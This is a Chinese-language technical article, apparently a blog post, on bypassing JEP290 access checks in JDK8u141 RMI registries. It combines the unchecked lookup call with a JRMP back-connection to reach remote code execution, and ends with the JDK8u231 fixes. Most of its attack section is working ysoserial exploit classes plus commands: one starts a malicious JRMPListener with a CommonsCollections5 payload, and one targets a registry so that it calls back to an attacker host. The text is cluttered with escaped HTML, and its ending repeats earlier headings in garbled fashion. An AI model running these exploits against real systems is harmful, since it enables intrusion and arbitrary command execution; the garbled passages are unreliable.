Java安全研究：JDK8u141版本绕过技术分析<\/h1>

1. 背景介绍<\/h2>
从JDK8u141开始，JEP290中针对`RegistryImpl_Skel#dispatch<\/code>中的bind<\/code>、unbind<\/code>、rebind<\/code>操作增加了checkAccess<\/code>检查，此项检查只允许来源为本地。<\/p>`

2. 安全机制分析<\/h2>
2.1 checkAccess机制<\/h3>
在JDK8u141中，RegistryImpl_Skel#dispatch方法增加了安全检查：<\/p>
public<\/span> void<\/span> dispatch<\/span>(<\/span>Remote var1,<\/span> RemoteCall var2,<\/span> int<\/span> var3,<\/span> long<\/span> var4)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    if<\/span> (<\/span>var4 !=<\/span> 4905912898345647071L<\/span>)<\/span> {<\/span>
<\/span><\/span>        throw<\/span> new<\/span> SkeletonMismatchException(<\/span>"interface hash mismatch"<\/span>);<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        RegistryImpl var6 =<\/span> (<\/span>RegistryImpl)<\/span>var1;<\/span>
<\/span><\/span>        String var7;<\/span>
<\/span><\/span>        ObjectInput var8;<\/span>
<\/span><\/span>        ObjectInput var9;<\/span>
<\/span><\/span>        Remote var80;<\/span>
<\/span><\/span>        switch<\/span>(<\/span>var3)<\/span> {<\/span>
<\/span><\/span>            case<\/span> 0<\/span>:<\/span>
<\/span><\/span>                RegistryImpl.<\/span>checkAccess<\/span>(<\/span>"Registry.bind"<\/span>);<\/span>
<\/span><\/span>                try<\/span> {<\/span>
<\/span><\/span>                    var9 =<\/span> var2.<\/span>getInputStream<\/span>();<\/span>
<\/span><\/span>                    var7 =<\/span> (<\/span>String)<\/span>var9.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>                    var80 =<\/span> (<\/span>Remote)<\/span>var9.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>                }<\/span> catch<\/span> (<\/span>ClassNotFoundException |<\/span> IOException var77)<\/span> {<\/span>
<\/span><\/span>                    throw<\/span> new<\/span> UnmarshalException(<\/span>"error unmarshalling arguments"<\/span>,<\/span> var77);<\/span>
<\/span><\/span>                }<\/span> finally<\/span> {<\/span>
<\/span><\/span>                    var2.<\/span>releaseInputStream<\/span>();<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>                var6.<\/span>bind<\/span>(<\/span>var7,<\/span> var80);<\/span>
<\/span><\/span>                try<\/span> {<\/span>
<\/span><\/span>                    var2.<\/span>getResultStream<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>                    break<\/span>;<\/span>
<\/span><\/span>                }<\/span> catch<\/span> (<\/span>IOException var76)<\/span> {<\/span>
<\/span><\/span>                    throw<\/span> new<\/span> MarshalException(<\/span>"error marshalling return"<\/span>,<\/span> var76);<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>            \/\/ 其他case省略...
<\/span><\/span><\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>checkAccess<\/code>方法的具体实现：<\/p>
public<\/span> static<\/span> void<\/span> checkAccess<\/span>(<\/span>String var0)<\/span> throws<\/span> AccessException {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        final<\/span> String var1 =<\/span> getClientHost();<\/span>
<\/span><\/span>        final<\/span> InetAddress var2;<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            var2 =<\/span> (<\/span>InetAddress)<\/span>AccessController.<\/span>doPrivileged<\/span>(<\/span>new<\/span> PrivilegedExceptionAction<<\/span>InetAddress>()<\/span> {<\/span>
<\/span><\/span>                public<\/span> InetAddress run<\/span>()<\/span> throws<\/span> UnknownHostException {<\/span>
<\/span><\/span>                    return<\/span> InetAddress.<\/span>getByName<\/span>(<\/span>var1);<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>            });<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>PrivilegedActionException var5)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> (<\/span>UnknownHostException)<\/span>var5.<\/span>getException<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        if<\/span> (<\/span>allowedAccessCache.<\/span>get<\/span>(<\/span>var2)<\/span> ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            if<\/span> (<\/span>var2.<\/span>isAnyLocalAddress<\/span>())<\/span> {<\/span>
<\/span><\/span>                throw<\/span> new<\/span> AccessException(<\/span>var0 +<\/span> " disallowed; origin unknown"<\/span>);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            try<\/span> {<\/span>
<\/span><\/span>                AccessController.<\/span>doPrivileged<\/span>(<\/span>new<\/span> PrivilegedExceptionAction<<\/span>Void>()<\/span> {<\/span>
<\/span><\/span>                    public<\/span> Void run<\/span>()<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>                        (<\/span>new<\/span> ServerSocket(<\/span>0<\/span>,<\/span> 10<\/span>,<\/span> var2)).<\/span>close<\/span>();<\/span>
<\/span><\/span>                        RegistryImpl.<\/span>allowedAccessCache<\/span>.<\/span>put<\/span>(<\/span>var2,<\/span> var2);<\/span>
<\/span><\/span>                        return<\/span> null<\/span>;<\/span>
<\/span><\/span>                    }<\/span>
<\/span><\/span>                });<\/span>
<\/span><\/span>            }<\/span> catch<\/span> (<\/span>PrivilegedActionException var4)<\/span> {<\/span>
<\/span><\/span>                throw<\/span> new<\/span> AccessException(<\/span>var0 +<\/span> " disallowed; origin "<\/span> +<\/span> var2 +<\/span> " is non-local host"<\/span>);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>ServerNotActiveException var6)<\/span> {<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>UnknownHostException var7)<\/span> {<\/span>
<\/span><\/span>        throw<\/span> new<\/span> AccessException(<\/span>var0 +<\/span> " disallowed; origin is unknown host"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2 方法映射关系<\/h3>
在RMI通信中，RegistryImpl_Skel#dispatch<\/code>方法的var3<\/code>参数代表客户端发起连接的方法：<\/p>

0 -> bind<\/li>
1 -> list<\/li>
2 -> lookup<\/li>
3 -> rebind<\/li>
4 -> unbind<\/li>
<\/ul>
3. 绕过技术分析<\/h2>
3.1 绕过思路<\/h3>
关键发现：<\/p>

在bind<\/code>、rebind<\/code>、unbind<\/code>和lookup<\/code>中都有反序列化操作<\/li>
只有lookup<\/code>中没有调用checkAccess<\/code><\/li>
RegistryImpl_Stub#lookup<\/code>方法只接受String参数，无法直接传递恶意对象<\/li>
<\/ol>
绕过方案：<\/p>

利用lookup<\/code>方法（不检查来源）结合JRMP（绕过JEP290）来实施攻击<\/li>
<\/ul>
3.2 实现细节<\/h3>
3.2.1 自定义Naming类<\/h4>
package<\/span> ysoserial.exploit;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> ysoserial.payloads.util.Reflections;<\/span>
<\/span><\/span>import<\/span> java.rmi.NotBoundException;<\/span>
<\/span><\/span>import<\/span> java.rmi.Remote;<\/span>
<\/span><\/span>import<\/span> java.rmi.RemoteException;<\/span>
<\/span><\/span>import<\/span> java.rmi.registry.Registry;<\/span>
<\/span><\/span>import<\/span> java.rmi.server.Operation;<\/span>
<\/span><\/span>import<\/span> java.rmi.server.RemoteRef;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Naming<\/span> {<\/span>
<\/span><\/span>    private<\/span> Naming<\/span>()<\/span> {}<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> Remote lookup<\/span>(<\/span>Registry registry,<\/span> Object obj)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        RemoteRef ref =<\/span> (<\/span>RemoteRef)<\/span>Reflections.<\/span>getFieldValue<\/span>(<\/span>registry,<\/span> "ref"<\/span>);<\/span>
<\/span><\/span>        long<\/span> interfaceHash =<\/span> Long.<\/span>valueOf<\/span>(<\/span>String.<\/span>valueOf<\/span>(<\/span>Reflections.<\/span>getFieldValue<\/span>(<\/span>registry,<\/span> "interfaceHash"<\/span>)));<\/span>
<\/span><\/span>        java.<\/span>rmi<\/span>.<\/span>server<\/span>.<\/span>Operation<\/span>[]<\/span> operations =<\/span> (<\/span>Operation[])<\/span>Reflections.<\/span>getFieldValue<\/span>(<\/span>registry,<\/span> "operations"<\/span>);<\/span>
<\/span><\/span>        java.<\/span>rmi<\/span>.<\/span>server<\/span>.<\/span>RemoteCall<\/span> call =<\/span> ref.<\/span>newCall<\/span>((<\/span>java.<\/span>rmi<\/span>.<\/span>server<\/span>.<\/span>RemoteObject<\/span>)<\/span>registry,<\/span> operations,<\/span> 2<\/span>,<\/span> interfaceHash);<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            try<\/span> {<\/span>
<\/span><\/span>                java.<\/span>io<\/span>.<\/span>ObjectOutput<\/span> out =<\/span> call.<\/span>getOutputStream<\/span>();<\/span>
<\/span><\/span>                \/\/ 反射修改enableReplace
<\/span><\/span><\/span><\/span>                Reflections.<\/span>setFieldValue<\/span>(<\/span>out,<\/span> "enableReplace"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span>                out.<\/span>writeObject<\/span>(<\/span>obj);<\/span> \/\/ arm obj
<\/span><\/span><\/span><\/span>            }<\/span> catch<\/span> (<\/span>java.<\/span>io<\/span>.<\/span>IOException<\/span> e)<\/span> {<\/span>
<\/span><\/span>                throw<\/span> new<\/span> java.<\/span>rmi<\/span>.<\/span>MarshalException<\/span>(<\/span>"error marshalling arguments"<\/span>,<\/span> e);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            ref.<\/span>invoke<\/span>(<\/span>call);<\/span>
<\/span><\/span>            return<\/span> null<\/span>;<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>RuntimeException |<\/span> RemoteException |<\/span> NotBoundException e)<\/span> {<\/span>
<\/span><\/span>            if<\/span> (<\/span>e instanceof<\/span> RemoteException |<\/span> e instanceof<\/span> ClassCastException){<\/span>
<\/span><\/span>                return<\/span> null<\/span>;<\/span>
<\/span><\/span>            }<\/span> else<\/span> {<\/span>
<\/span><\/span>                throw<\/span> e;<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>java.<\/span>lang<\/span>.<\/span>Exception<\/span> e)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> java.<\/span>rmi<\/span>.<\/span>UnexpectedException<\/span>(<\/span>"undeclared checked exception"<\/span>,<\/span> e);<\/span>
<\/span><\/span>        }<\/span> finally<\/span> {<\/span>
<\/span><\/span>            ref.<\/span>done<\/span>(<\/span>call);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2.2 LookupBypassJEP290实现<\/h4>
package<\/span> ysoserial.exploit;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> java.io.IOException;<\/span>
<\/span><\/span>import<\/span> java.net.Socket;<\/span>
<\/span><\/span>import<\/span> java.rmi.ConnectIOException;<\/span>
<\/span><\/span>import<\/span> java.rmi.Remote;<\/span>
<\/span><\/span>import<\/span> java.rmi.registry.LocateRegistry;<\/span>
<\/span><\/span>import<\/span> java.rmi.registry.Registry;<\/span>
<\/span><\/span>import<\/span> java.rmi.server.RMIClientSocketFactory;<\/span>
<\/span><\/span>import<\/span> java.security.cert.X509Certificate;<\/span>
<\/span><\/span>import<\/span> java.util.concurrent.Callable;<\/span>
<\/span><\/span>import<\/span> javax.net.ssl.*;<\/span>
<\/span><\/span>import<\/span> ysoserial.payloads.JRMPClient1;<\/span>
<\/span><\/span>import<\/span> ysoserial.secmgr.ExecCheckingSecurityManager;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> LookupBypassJEP290<\/span> {<\/span>
<\/span><\/span>    \/\/ SSL相关实现省略...
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>final<\/span> String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        final<\/span> String host =<\/span> args[<\/span>0<\/span>];<\/span>
<\/span><\/span>        final<\/span> int<\/span> port =<\/span> Integer.<\/span>parseInt<\/span>(<\/span>args[<\/span>1<\/span>]);<\/span>
<\/span><\/span>        final<\/span> String command =<\/span> args[<\/span>2<\/span>];<\/span>
<\/span><\/span>        Registry registry =<\/span> LocateRegistry.<\/span>getRegistry<\/span>(<\/span>host,<\/span> port);<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            registry.<\/span>list<\/span>();<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>ConnectIOException ex)<\/span> {<\/span>
<\/span><\/span>            registry =<\/span> LocateRegistry.<\/span>getRegistry<\/span>(<\/span>host,<\/span> port,<\/span> new<\/span> RMISSLClientSocketFactory());<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        exploit(<\/span>registry,<\/span> command);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> exploit<\/span>(<\/span>final<\/span> Registry registry,<\/span> final<\/span> String command)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        new<\/span> ExecCheckingSecurityManager().<\/span>callWrapped<\/span>(<\/span>new<\/span> Callable<<\/span>Void>(){<\/span>
<\/span><\/span>            public<\/span> Void call<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>                JRMPClient1 jrmpclient =<\/span> new<\/span> JRMPClient1();<\/span>
<\/span><\/span>                Remote remote =<\/span> jrmpclient.<\/span>getObject<\/span>(<\/span>command);<\/span>
<\/span><\/span>                try<\/span> {<\/span>
<\/span><\/span>                    Naming.<\/span>lookup<\/span>(<\/span>registry,<\/span> remote);<\/span>
<\/span><\/span>                }<\/span> catch<\/span> (<\/span>Throwable e)<\/span> {<\/span>
<\/span><\/span>                    e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>                return<\/span> null<\/span>;<\/span>
<\/span><\/span>            }});<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2.3 修改后的JRMPClient1<\/h4>
package<\/span> ysoserial.payloads;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> java.rmi.Remote;<\/span>
<\/span><\/span>import<\/span> java.rmi.server.ObjID;<\/span>
<\/span><\/span>import<\/span> java.rmi.server.RemoteObjectInvocationHandler;<\/span>
<\/span><\/span>import<\/span> java.util.Random;<\/span>
<\/span><\/span>import<\/span> sun.rmi.server.UnicastRef;<\/span>
<\/span><\/span>import<\/span> sun.rmi.transport.LiveRef;<\/span>
<\/span><\/span>import<\/span> sun.rmi.transport.tcp.TCPEndpoint;<\/span>
<\/span><\/span>import<\/span> ysoserial.payloads.annotation.Authors;<\/span>
<\/span><\/span>import<\/span> ysoserial.payloads.annotation.PayloadTest;<\/span>
<\/span><\/span>import<\/span> ysoserial.payloads.util.PayloadRunner;<\/span>
<\/span><\/span>
<\/span><\/span>@SuppressWarnings<\/span>({<\/span>"restriction"<\/span>})<\/span>
<\/span><\/span>@PayloadTest<\/span>(<\/span>harness =<\/span> "ysoserial.test.payloads.JRMPReverseConnectSMTest"<\/span>)<\/span>
<\/span><\/span>@Authors<\/span>({<\/span> Authors.<\/span>MBECHLER<\/span> })<\/span>
<\/span><\/span>public<\/span> class<\/span> JRMPClient1<\/span> extends<\/span> PayloadRunner implements<\/span> ObjectPayload<<\/span>Remote><\/span> {<\/span>
<\/span><\/span>    public<\/span> Remote getObject<\/span>(<\/span>final<\/span> String command)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        String host;<\/span>
<\/span><\/span>        int<\/span> port;<\/span>
<\/span><\/span>        int<\/span> sep =<\/span> command.<\/span>indexOf<\/span>(<\/span>':'<\/span>);<\/span>
<\/span><\/span>        if<\/span> (<\/span>sep <<\/span> 0<\/span>)<\/span> {<\/span>
<\/span><\/span>            port =<\/span> new<\/span> Random().<\/span>nextInt<\/span>(<\/span>65535<\/span>);<\/span>
<\/span><\/span>            host =<\/span> command;<\/span>
<\/span><\/span>        }<\/span> else<\/span> {<\/span>
<\/span><\/span>            host =<\/span> command.<\/span>substring<\/span>(<\/span>0<\/span>,<\/span> sep);<\/span>
<\/span><\/span>            port =<\/span> Integer.<\/span>valueOf<\/span>(<\/span>command.<\/span>substring<\/span>(<\/span>sep +<\/span> 1<\/span>));<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        ObjID id =<\/span> new<\/span> ObjID(<\/span>new<\/span> Random().<\/span>nextInt<\/span>());<\/span> \/\/ RMI registry
<\/span><\/span><\/span><\/span>        TCPEndpoint te =<\/span> new<\/span> TCPEndpoint(<\/span>host,<\/span> port);<\/span>
<\/span><\/span>        UnicastRef ref =<\/span> new<\/span> UnicastRef(<\/span>new<\/span> LiveRef(<\/span>id,<\/span> te,<\/span> false<\/span>));<\/span>
<\/span><\/span>        Remote obj =<\/span> new<\/span> RemoteObjectInvocationHandler(<\/span>ref);<\/span>
<\/span><\/span>        return<\/span> obj;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>final<\/span> String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Thread.<\/span>currentThread<\/span>().<\/span>setContextClassLoader<\/span>(<\/span>JRMPClient1.<\/span>class<\/span>.<\/span>getClassLoader<\/span>());<\/span>
<\/span><\/span>        PayloadRunner.<\/span>run<\/span>(<\/span>JRMPClient1.<\/span>class<\/span>,<\/span> args);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. 实际利用流程<\/h2>
4.1 攻击步骤<\/h3>


启动恶意JRMPListener<\/strong>:<\/p>
"C:\Program Files\Java\jdk1.8.0_181\bin\java.exe" -cp ysoserial.jar ysoserial.exploit.JRMPListener 1088 CommonsCollections5 "cmd.exe \/c calc"
<\/code><\/pre>
<\/li>

受害者RMI服务示例<\/strong>:<\/p>
package<\/span> org.al1ex;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> java.rmi.registry.LocateRegistry;<\/span>
<\/span><\/span>import<\/span> java.rmi.registry.Registry;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> RMIServer<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            \/\/ 创建远程对象
<\/span><\/span><\/span><\/span>            HelloService helloService =<\/span> new<\/span> HelloServiceImpl();<\/span>
<\/span><\/span>            \/\/ 创建RMI注册表
<\/span><\/span><\/span><\/span>            Registry registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>1099<\/span>);<\/span>
<\/span><\/span>            registry.<\/span>bind<\/span>(<\/span>"HelloService"<\/span>,<\/span> helloService);<\/span>
<\/span><\/span>            System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"RMI Server is ready."<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>

发起攻击<\/strong>:<\/p>
"C:\Program Files\Java\jdk1.8.0_181\bin\java.exe" -cp ysoserial.jar ysoserial.exploit.LookupBypassJEP290 192.168.1.10 1099 192.168.1.16:1088
<\/code><\/pre>
<\/li>
<\/ol>
5. 修复措施<\/h2>
5.1 JDK8u231的修复<\/h3>


异常处理增强<\/strong>:<\/p>

在RegistryImpl_Skel#dispatch<\/code>中的每个case都增加了ClassCastException<\/code>处理<\/li>
反序列化时会因为返回对象类型不是String而报错<\/li>
调用StreamRemoteCall#discardPendingRefs<\/code>清除incomingRefTable<\/code>属性的值<\/li>
<\/ul>
<\/li>

过滤器机制<\/strong>:<\/p>

在DGCImpl_Stub#dirty<\/code>函数中增加了setObjectInputFilter<\/code><\/li>
leaseFilter<\/code>方法严格限制反序列化类:
private<\/span> static<\/span> ObjectInputFilter.<\/span>Status<\/span> leaseFilter<\/span>(<\/span>ObjectInputFilter.<\/span>FilterInfo<\/span> var0)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>var0.<\/span>depth<\/span>()<\/span> ><\/span> (<\/span>long<\/span>)<\/span>DGCCLIENT_MAX_DEPTH)<\/span> {<\/span>
<\/span><\/span>        return<\/span> Status.<\/span>REJECTED<\/span>;<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        Class var1 =<\/span> var0.<\/span>serialClass<\/span>();<\/span>
<\/span><\/span>        if<\/span> (<\/span>var1 ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            return<\/span> Status.<\/span>UNDECIDED<\/span>;<\/span>
<\/span><\/span>        }<\/span> else<\/span> {<\/span>
<\/span><\/span>            while<\/span>(<\/span>var1.<\/span>isArray<\/span>())<\/span> {<\/span>
<\/span><\/span>                if<\/span> (<\/span>var0.<\/span>arrayLength<\/span>()<\/span> >=<\/span> 0<\/span>L &&<\/span> var0.<\/span>arrayLength<\/span>()<\/span> ><\/span> (<\/span>long<\/span>)<\/span>DGCCLIENT_MAX_ARRAY_SIZE)<\/span> {<\/span>
<\/span><\/span>                    return<\/span> Status.<\/span>REJECTED<\/span>;<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>                var1 =<\/span> var1.<\/span>getComponentType<\/span>();<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            if<\/span> (<\/span>var1.<\/span>isPrimitive<\/span>())<\/span> {<\/span>
<\/span><\/span>                return<\/span> Status.<\/span>ALLOWED<\/span>;<\/span>
<\/span><\/span>            }<\/span> else<\/span> {<\/span>
<\/span><\/span>                return<\/span> var1 !=<\/span> UID.<\/span>class<\/span> &&<\/span> var1 !=<\/span> VMID.<\/span>class<\/span> &&<\/span> var1 !=<\/span> Lease.<\/span>class<\/span> 
<\/span><\/span>                    &&<\/span> (<\/span>var1.<\/span>getPackage<\/span>()<\/span> ==<\/span> null<\/span> ||<\/span> !<\/span>Throwable.<\/span>class<\/span>.<\/span>isAssignableFrom<\/span>(<\/span>var1)<\/span> 
<\/span><\/span>                    ||<\/span> !<\/span>"java.lang"<\/span>.<\/span>equals<\/span>(<\/span>var1.<\/span>getPackage<\/span>().<\/span>getName<\/span>())<\/span> 
<\/span><\/span>                    &&<\/span> !<\/span>"java.rmi"<\/span>.<\/span>equals<\/span>(<\/span>var1.<\/span>getPackage<\/span>().<\/span>getName<\/span>()))<\/span> 
<\/span><\/span>                    &&<\/span> var1 !=<\/span> StackTraceElement.<\/span>class<\/span> &&<\/span> var1 !=<\/span> ArrayList.<\/span>class<\/span> 
<\/span><\/span>                    &&<\/span> var1 !=<\/span> Object.<\/span>class<\/span> 
<\/span><\/span>                    &&<\/span> !<\/span>var1.<\/span>getName<\/span>().<\/span>equals<\/span>(<\/span>"java.util.Collections$UnmodifiableList"<\/span>)<\/span> 
<\/span><\/span>                    &&<\/span> !<\/span>var1.<\/span>getName<\/span>().<\/span>equals<\/span>(<\/span>"java.util.Collections$UnmodifiableCollection"<\/span>)<\/span> 
<\/span><\/span>                    &&<\/span> !<\/span>var1.<\/span>getName<\/span>().<\/span>equals<\/span>(<\/span>"java.util.Collections$UnmodifiableRandomAccessList"<\/span>)<\/span> 
<\/span><\/span>                    &&<\/span> !<\/span>var1.<\/span>getName<\/span>().<\/span>equals<\/span>(<\/span>"java.util.Collections$EmptyList"<\/span>)<\/span> 
<\/span><\/span>                    ?<\/span> Status.<\/span>REJECTED<\/span> :<\/span> Status.<\/span>ALLOWED<\/span>;<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
6. 版本影响范围<\/h2>


JDK8u121~141<\/strong>:<\/p>

可以直接利用UnicastRef链路进行绕过<\/li>
<\/ul>
<\/li>

JDK8u141~231<\/strong>:<\/p>

需要结合CheckAccess的绕过与JRMP反序列化机制<\/li>
<\/ul>
<\/li>

JDK8u231及以上<\/strong>:<\/p>

通过新增的过滤器和异常处理机制修复了此漏洞<\/li>
<\/ul>
<\/li>
<\/ol>
Java安全研究：JDK8u141版本绕过技术分析<\/h1>

1. 背景介绍<\/h2> 从JDK8u141开始，JEP290中针对RegistryImpl_Skel#dispatch<\/code>中的bind<\/code>、unbind<\/code>、rebind<\/code>操作增加了checkAccess<\/code>检查，此项检查只允许来源为本地。<\/p>

3. 绕过技术分析<\/h2>

3.2 实现细节<\/h3>

4. 实际利用流程<\/h2>

5. 修复措施<\/h2>

1. 背景介绍<\/h2>
从JDK8u141开始，JEP290中针对`RegistryImpl_Skel#dispatch<\/code>中的bind<\/code>、unbind<\/code>、rebind<\/code>操作增加了checkAccess<\/code>检查，此项检查只允许来源为本地。<\/p>`
